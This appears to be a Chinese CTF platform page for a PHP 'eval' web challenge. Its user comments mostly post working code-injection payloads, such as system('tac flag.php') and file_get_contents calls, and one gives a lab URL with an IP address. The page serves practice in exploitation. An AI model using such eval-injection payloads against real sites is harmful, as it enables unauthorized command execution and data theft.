evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18155
提  示:
描  述:
eval
评论
daosheng 6月前

?hello=);system('cat /f*'

回复 0

lordinglord 7月前

构造闭合,?hello=);var_dump(file_get_contents('flag.php'));//

回复 0

金智秀的老公 7月前

金智秀的老公到此一游

回复 2

Pixelw 7月前

http://117.72.52.127:15551/?hello=system(%27tac%20flag.php%27)

回复 2

Pixelw 7月前

Too Young Too Simple

回复 0

lfs451 7月前

?hello=highlight_file(%27flag.php%27)

回复 0

传奇吉他手千早爱音 7月前

比F和弦简单

回复 2

liuguowang75 8月前

/?hello=system('ls') /?hello=system('cat flag.php')

回复 0

HK1ng 8月前

这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。

回复 6
一个姓⎝李⎠的师傅~ 4月前

@Gargantua 因为浏览器遇到 <?php 这种特殊非 html 标准标签时,会触发浏览器自己的容错机制,把 php 代码字符串用灰色字符保留下来再源码中,但是不会当做字符串显示在浏览器上,更不会执行!

回复 0

Gargantua 8月前

这是什么原因呢?是不是因为浏览器将php代码执行了啊

回复 0

zhwen 8月前

代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'

回复 0

WriteUp

image
harry

1 金币

评分(10)

解题动态

Niko_83c 攻破了该题 59分钟前
542698 攻破了该题 1小时前
slsdy 攻破了该题 4小时前
IamnotLin 攻破了该题 12小时前
zzZxby 攻破了该题 15小时前
yyc4088 攻破了该题 16小时前
xhonggcc 攻破了该题 19小时前
570570 攻破了该题 20小时前
lilym 攻破了该题 20小时前
color111111 攻破了该题 1天前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 2天前
19941759966 攻破了该题 2天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
1293273679 攻破了该题 2天前
问题反馈